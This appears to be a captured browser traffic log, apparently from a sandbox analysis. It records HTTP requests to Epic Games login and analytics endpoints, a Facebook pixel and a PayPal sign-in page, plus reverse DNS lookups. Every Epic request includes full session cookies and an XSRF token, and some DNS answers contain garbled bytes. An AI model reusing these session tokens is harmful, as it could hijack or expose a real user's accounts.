referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=bcbfe2af20c844ccb58e2079da97664f; EPIC_SESSION_AP=bBw7kwxyoZ-uaCywV7ts0w.Yy_rihNWUeQcxQRZq62s8BHtqTVML2uicDCATyOeimVaVb_NOdzqe6Nbk3hUuT3Grr3Rnhkk_7e8lQJtYwenIb91kOFpboLvOiI2jiLFqc4jmaXZwpxyKkrhLIM6tep4xC5Ff-g0nX0ToGU6ODbWZA.1698987017152.86400000._6Ws0NK52TuLU3DUJSjtrQ; EPIC_SESSION_REPUTATION=BPn2lLFONWHmN_5jyapvgQ.OUcJMITAjCBLqm4RftA-uSyewQymsbqJsvL9ZFofhD1LZVkH6_QxPcKP2xaELUjPDT__hFHISfezF15rJAMgEIfEqjT1gijzXG8a3t2_9OqOjgwYycpOxLmWZvUUr-SNW2J_-YgOQqPLTwRQ2pfKZV0fhvq_2ugayVZYrqHyfxb4kweo_COWtRVokUlRLTGoXtTCPdnoaGNBwI67jOYH5C0thfZwV-D2n-6G2jKXLjKhF_xVsPRZYa41wFMxDXR_emdi2ThOoi2ZH2kSsL3sW1IrVVTqEBRC2LtCCON6hN6w3qMYbyLwz91A_ptmSJ5B2FOo7LllghkEFRC69xXZTGjaIfOfv-VlRU-F2wNyUNRJwvxEljHYIjShg8_RxaMrJLXcMzMWhlYTGHWpU11XEA.1698987017152.86400000.sEqsjlugBfGynFrgnBwW1A; _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: application/json; charset=utf-8
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
etag: W/"8fd-gXLhN5OiONulDAF4mTTtmsi92Lg"
content-encoding: gzip
cache-control: no-cache
GET

https://www.epicgames.com/id/api/i18n?ns=epic-consent-dialog

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

GET /id/api/i18n?ns=epic-consent-dialog HTTP/2.0
host: www.epicgames.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=bcbfe2af20c844ccb58e2079da97664f; EPIC_SESSION_AP=bBw7kwxyoZ-uaCywV7ts0w.Yy_rihNWUeQcxQRZq62s8BHtqTVML2uicDCATyOeimVaVb_NOdzqe6Nbk3hUuT3Grr3Rnhkk_7e8lQJtYwenIb91kOFpboLvOiI2jiLFqc4jmaXZwpxyKkrhLIM6tep4xC5Ff-g0nX0ToGU6ODbWZA.1698987017152.86400000._6Ws0NK52TuLU3DUJSjtrQ; EPIC_SESSION_REPUTATION=BPn2lLFONWHmN_5jyapvgQ.OUcJMITAjCBLqm4RftA-uSyewQymsbqJsvL9ZFofhD1LZVkH6_QxPcKP2xaELUjPDT__hFHISfezF15rJAMgEIfEqjT1gijzXG8a3t2_9OqOjgwYycpOxLmWZvUUr-SNW2J_-YgOQqPLTwRQ2pfKZV0fhvq_2ugayVZYrqHyfxb4kweo_COWtRVokUlRLTGoXtTCPdnoaGNBwI67jOYH5C0thfZwV-D2n-6G2jKXLjKhF_xVsPRZYa41wFMxDXR_emdi2ThOoi2ZH2kSsL3sW1IrVVTqEBRC2LtCCON6hN6w3qMYbyLwz91A_ptmSJ5B2FOo7LllghkEFRC69xXZTGjaIfOfv-VlRU-F2wNyUNRJwvxEljHYIjShg8_RxaMrJLXcMzMWhlYTGHWpU11XEA.1698987017152.86400000.sEqsjlugBfGynFrgnBwW1A; _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: application/json; charset=utf-8
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
etag: W/"10039-H4uBeSiPAw9SZyRoljPnIjwiv5Q"
content-encoding: gzip
cache-control: no-cache
GET

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

GET /id/api/analytics HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-epic-strategy-flags:
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 31540
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: bcbfe2af20c844ccb58e2079da97664f
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=bcbfe2af20c844ccb58e2079da97664f; EPIC_SESSION_AP=bBw7kwxyoZ-uaCywV7ts0w.Yy_rihNWUeQcxQRZq62s8BHtqTVML2uicDCATyOeimVaVb_NOdzqe6Nbk3hUuT3Grr3Rnhkk_7e8lQJtYwenIb91kOFpboLvOiI2jiLFqc4jmaXZwpxyKkrhLIM6tep4xC5Ff-g0nX0ToGU6ODbWZA.1698987017152.86400000._6Ws0NK52TuLU3DUJSjtrQ; EPIC_SESSION_REPUTATION=BPn2lLFONWHmN_5jyapvgQ.OUcJMITAjCBLqm4RftA-uSyewQymsbqJsvL9ZFofhD1LZVkH6_QxPcKP2xaELUjPDT__hFHISfezF15rJAMgEIfEqjT1gijzXG8a3t2_9OqOjgwYycpOxLmWZvUUr-SNW2J_-YgOQqPLTwRQ2pfKZV0fhvq_2ugayVZYrqHyfxb4kweo_COWtRVokUlRLTGoXtTCPdnoaGNBwI67jOYH5C0thfZwV-D2n-6G2jKXLjKhF_xVsPRZYa41wFMxDXR_emdi2ThOoi2ZH2kSsL3sW1IrVVTqEBRC2LtCCON6hN6w3qMYbyLwz91A_ptmSJ5B2FOo7LllghkEFRC69xXZTGjaIfOfv-VlRU-F2wNyUNRJwvxEljHYIjShg8_RxaMrJLXcMzMWhlYTGHWpU11XEA.1698987017152.86400000.sEqsjlugBfGynFrgnBwW1A; _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:23 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"44-j7mn9dRpR4M1Bn6FNqyTUXJGbhY"
cache-control: no-cache
content-encoding: gzip
GET

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

GET /id/api/analytics HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-epic-strategy-flags:
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 31564
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: bcbfe2af20c844ccb58e2079da97664f
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=bcbfe2af20c844ccb58e2079da97664f; EPIC_SESSION_AP=bBw7kwxyoZ-uaCywV7ts0w.Yy_rihNWUeQcxQRZq62s8BHtqTVML2uicDCATyOeimVaVb_NOdzqe6Nbk3hUuT3Grr3Rnhkk_7e8lQJtYwenIb91kOFpboLvOiI2jiLFqc4jmaXZwpxyKkrhLIM6tep4xC5Ff-g0nX0ToGU6ODbWZA.1698987017152.86400000._6Ws0NK52TuLU3DUJSjtrQ; EPIC_SESSION_REPUTATION=BPn2lLFONWHmN_5jyapvgQ.OUcJMITAjCBLqm4RftA-uSyewQymsbqJsvL9ZFofhD1LZVkH6_QxPcKP2xaELUjPDT__hFHISfezF15rJAMgEIfEqjT1gijzXG8a3t2_9OqOjgwYycpOxLmWZvUUr-SNW2J_-YgOQqPLTwRQ2pfKZV0fhvq_2ugayVZYrqHyfxb4kweo_COWtRVokUlRLTGoXtTCPdnoaGNBwI67jOYH5C0thfZwV-D2n-6G2jKXLjKhF_xVsPRZYa41wFMxDXR_emdi2ThOoi2ZH2kSsL3sW1IrVVTqEBRC2LtCCON6hN6w3qMYbyLwz91A_ptmSJ5B2FOo7LllghkEFRC69xXZTGjaIfOfv-VlRU-F2wNyUNRJwvxEljHYIjShg8_RxaMrJLXcMzMWhlYTGHWpU11XEA.1698987017152.86400000.sEqsjlugBfGynFrgnBwW1A; _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 204

date: Fri, 03 Nov 2023 04:50:24 GMT
x-powered-by: PHP 7.2.7
vary: Origin
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
cache-control: no-cache
GET

https://www.epicgames.com/id/api/authenticate

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

GET /id/api/authenticate HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-epic-strategy-flags:
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 31567
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: bcbfe2af20c844ccb58e2079da97664f
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=bcbfe2af20c844ccb58e2079da97664f; EPIC_SESSION_AP=bBw7kwxyoZ-uaCywV7ts0w.Yy_rihNWUeQcxQRZq62s8BHtqTVML2uicDCATyOeimVaVb_NOdzqe6Nbk3hUuT3Grr3Rnhkk_7e8lQJtYwenIb91kOFpboLvOiI2jiLFqc4jmaXZwpxyKkrhLIM6tep4xC5Ff-g0nX0ToGU6ODbWZA.1698987017152.86400000._6Ws0NK52TuLU3DUJSjtrQ; EPIC_SESSION_REPUTATION=BPn2lLFONWHmN_5jyapvgQ.OUcJMITAjCBLqm4RftA-uSyewQymsbqJsvL9ZFofhD1LZVkH6_QxPcKP2xaELUjPDT__hFHISfezF15rJAMgEIfEqjT1gijzXG8a3t2_9OqOjgwYycpOxLmWZvUUr-SNW2J_-YgOQqPLTwRQ2pfKZV0fhvq_2ugayVZYrqHyfxb4kweo_COWtRVokUlRLTGoXtTCPdnoaGNBwI67jOYH5C0thfZwV-D2n-6G2jKXLjKhF_xVsPRZYa41wFMxDXR_emdi2ThOoi2ZH2kSsL3sW1IrVVTqEBRC2LtCCON6hN6w3qMYbyLwz91A_ptmSJ5B2FOo7LllghkEFRC69xXZTGjaIfOfv-VlRU-F2wNyUNRJwvxEljHYIjShg8_RxaMrJLXcMzMWhlYTGHWpU11XEA.1698987017152.86400000.sEqsjlugBfGynFrgnBwW1A; _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"44-j7mn9dRpR4M1Bn6FNqyTUXJGbhY"
cache-control: no-cache
content-encoding: gzip
POST

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

POST /id/api/analytics HTTP/2.0
host: www.epicgames.com
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
content-type: application/json
x-epic-strategy-flags:
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 31656
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: bcbfe2af20c844ccb58e2079da97664f
accept-encoding: gzip, deflate, br
content-length: 24
cache-control: no-cache
cookie: XSRF-TOKEN=bcbfe2af20c844ccb58e2079da97664f; EPIC_SESSION_AP=bBw7kwxyoZ-uaCywV7ts0w.Yy_rihNWUeQcxQRZq62s8BHtqTVML2uicDCATyOeimVaVb_NOdzqe6Nbk3hUuT3Grr3Rnhkk_7e8lQJtYwenIb91kOFpboLvOiI2jiLFqc4jmaXZwpxyKkrhLIM6tep4xC5Ff-g0nX0ToGU6ODbWZA.1698987017152.86400000._6Ws0NK52TuLU3DUJSjtrQ; EPIC_SESSION_REPUTATION=BPn2lLFONWHmN_5jyapvgQ.OUcJMITAjCBLqm4RftA-uSyewQymsbqJsvL9ZFofhD1LZVkH6_QxPcKP2xaELUjPDT__hFHISfezF15rJAMgEIfEqjT1gijzXG8a3t2_9OqOjgwYycpOxLmWZvUUr-SNW2J_-YgOQqPLTwRQ2pfKZV0fhvq_2ugayVZYrqHyfxb4kweo_COWtRVokUlRLTGoXtTCPdnoaGNBwI67jOYH5C0thfZwV-D2n-6G2jKXLjKhF_xVsPRZYa41wFMxDXR_emdi2ThOoi2ZH2kSsL3sW1IrVVTqEBRC2LtCCON6hN6w3qMYbyLwz91A_ptmSJ5B2FOo7LllghkEFRC69xXZTGjaIfOfv-VlRU-F2wNyUNRJwvxEljHYIjShg8_RxaMrJLXcMzMWhlYTGHWpU11XEA.1698987017152.86400000.sEqsjlugBfGynFrgnBwW1A; _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
access-control-allow-origin: https://www.epicgames.com
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"33-yUGxAlYEel0KLrsnT6i9i+2acMI"
cache-control: no-cache
content-encoding: gzip
GET

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

GET /id/api/analytics HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-epic-strategy-flags:
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 31721
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: bcbfe2af20c844ccb58e2079da97664f
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=bcbfe2af20c844ccb58e2079da97664f; EPIC_SESSION_AP=bBw7kwxyoZ-uaCywV7ts0w.Yy_rihNWUeQcxQRZq62s8BHtqTVML2uicDCATyOeimVaVb_NOdzqe6Nbk3hUuT3Grr3Rnhkk_7e8lQJtYwenIb91kOFpboLvOiI2jiLFqc4jmaXZwpxyKkrhLIM6tep4xC5Ff-g0nX0ToGU6ODbWZA.1698987017152.86400000._6Ws0NK52TuLU3DUJSjtrQ; EPIC_SESSION_REPUTATION=BPn2lLFONWHmN_5jyapvgQ.OUcJMITAjCBLqm4RftA-uSyewQymsbqJsvL9ZFofhD1LZVkH6_QxPcKP2xaELUjPDT__hFHISfezF15rJAMgEIfEqjT1gijzXG8a3t2_9OqOjgwYycpOxLmWZvUUr-SNW2J_-YgOQqPLTwRQ2pfKZV0fhvq_2ugayVZYrqHyfxb4kweo_COWtRVokUlRLTGoXtTCPdnoaGNBwI67jOYH5C0thfZwV-D2n-6G2jKXLjKhF_xVsPRZYa41wFMxDXR_emdi2ThOoi2ZH2kSsL3sW1IrVVTqEBRC2LtCCON6hN6w3qMYbyLwz91A_ptmSJ5B2FOo7LllghkEFRC69xXZTGjaIfOfv-VlRU-F2wNyUNRJwvxEljHYIjShg8_RxaMrJLXcMzMWhlYTGHWpU11XEA.1698987017152.86400000.sEqsjlugBfGynFrgnBwW1A; _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"44-j7mn9dRpR4M1Bn6FNqyTUXJGbhY"
cache-control: no-cache
content-encoding: gzip
POST

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

POST /id/api/analytics HTTP/2.0
host: www.epicgames.com
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
content-type: application/json
x-epic-strategy-flags: isolatedTestFlagEnabled=false
x-epic-event-category: login
x-epic-event-action: login
x-epic-flow: login
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 31891
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: bcbfe2af20c844ccb58e2079da97664f
accept-encoding: gzip, deflate, br
content-length: 95
cache-control: no-cache
cookie: XSRF-TOKEN=bcbfe2af20c844ccb58e2079da97664f; EPIC_SESSION_AP=bBw7kwxyoZ-uaCywV7ts0w.Yy_rihNWUeQcxQRZq62s8BHtqTVML2uicDCATyOeimVaVb_NOdzqe6Nbk3hUuT3Grr3Rnhkk_7e8lQJtYwenIb91kOFpboLvOiI2jiLFqc4jmaXZwpxyKkrhLIM6tep4xC5Ff-g0nX0ToGU6ODbWZA.1698987017152.86400000._6Ws0NK52TuLU3DUJSjtrQ; EPIC_SESSION_REPUTATION=BPn2lLFONWHmN_5jyapvgQ.OUcJMITAjCBLqm4RftA-uSyewQymsbqJsvL9ZFofhD1LZVkH6_QxPcKP2xaELUjPDT__hFHISfezF15rJAMgEIfEqjT1gijzXG8a3t2_9OqOjgwYycpOxLmWZvUUr-SNW2J_-YgOQqPLTwRQ2pfKZV0fhvq_2ugayVZYrqHyfxb4kweo_COWtRVokUlRLTGoXtTCPdnoaGNBwI67jOYH5C0thfZwV-D2n-6G2jKXLjKhF_xVsPRZYa41wFMxDXR_emdi2ThOoi2ZH2kSsL3sW1IrVVTqEBRC2LtCCON6hN6w3qMYbyLwz91A_ptmSJ5B2FOo7LllghkEFRC69xXZTGjaIfOfv-VlRU-F2wNyUNRJwvxEljHYIjShg8_RxaMrJLXcMzMWhlYTGHWpU11XEA.1698987017152.86400000.sEqsjlugBfGynFrgnBwW1A; _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
access-control-allow-origin: https://www.epicgames.com
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"33-yUGxAlYEel0KLrsnT6i9i+2acMI"
cache-control: no-cache
content-encoding: gzip
GET

https://facebook.com/security/hsts-pixel.gif?c=3.2

MicrosoftEdgeCP.exe

Remote address:

157.240.5.35:443

Request

GET /security/hsts-pixel.gif?c=3.2 HTTP/2.0
host: facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

location: https://fbcdn.net/security/hsts-pixel.gif?c=2
reporting-endpoints:
cross-origin-opener-policy: same-origin-allow-popups
access-control-allow-origin: *
strict-transport-security: max-age=15552000; includeSubDomains
content-type: text/html; charset="utf-8"
x-fb-debug: NPgQ6RXce12DC+byvoO5eh2WvXqQnFkBWMolKdRCn0RemO2LnqnXfNMR9GPsFTUNl6mkT3h+0HbIzPVN/qFecg==
content-length: 0
date: Fri, 03 Nov 2023 04:49:49 GMT
alt-svc: h3=":443"; ma=86400
DNS

113.106.207.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.106.207.23.in-addr.arpa

IN PTR

Response

113.106.207.23.in-addr.arpa

IN PTR

a23-207-106-113deploystaticakamaitechnologiescom
DNS

141.21.199.152.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.21.199.152.in-addr.arpa

IN PTR

Response
DNS

105.42.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

105.42.18.104.in-addr.arpa

IN PTR

Response
DNS

14.214.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.214.58.216.in-addr.arpa

IN PTR

Response

14.214.58.216.in-addr.arpa

IN PTR

lhr26s05-in-f141e100net

14.214.58.216.in-addr.arpa

IN PTR

ams17s09-in-f14�H

14.214.58.216.in-addr.arpa

IN PTR

�8
DNS

35.5.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.5.240.157.in-addr.arpa

IN PTR

Response

35.5.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-mad2facebookcom
DNS

3.71.198.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.71.198.34.in-addr.arpa

IN PTR

Response

3.71.198.34.in-addr.arpa

IN PTR

ec2-34-198-71-3 compute-1 amazonawscom
GET

https://www.paypal.com/signin

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

GET /signin HTTP/2.0
host: www.paypal.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
access-control-expose-headers: Server-Timing
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; script-src 'nonce-LldBgJNlCDoZMoJUh+Bc4b8kc83u/0jRZeljDME85YUggftE' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; img-src 'self' https://*.googleusercontent.com/ https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://ak1s.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com https://ak1.abmr.net data:; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://192.55.233.1 'unsafe-inline' https://*.qualtrics.com; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://smartlock.google.com https://*.qualtrics.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: text/html; charset=utf-8
etag: W/"7fb1-t3FKzqxTBClgp5JoTzoFXwRIdG8"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f29277434445e
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:49:51 GMT; Secure
set-cookie: cookie_check=yes; Max-Age=315619199; Domain=.paypal.com; Path=/; Expires=Thu, 03 Nov 2033 04:49:50 GMT; HttpOnly; Secure
set-cookie: d_id=061e865499cf40f9a445927eb8fa27a31698986991586; Max-Age=315619199; Domain=.paypal.com; Path=/; Expires=Thu, 03 Nov 2033 04:49:50 GMT; HttpOnly; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:35:47 GMT; HttpOnly; Secure
set-cookie: tsrce=unifiedloginnodeweb; Max-Age=259199; Domain=.paypal.com; Path=/; Expires=Mon, 06 Nov 2023 04:49:50 GMT; HttpOnly; Secure
set-cookie: HaC80bwXscjqZ7KM6VOxULOB534=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4Njk5MTYyOCIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
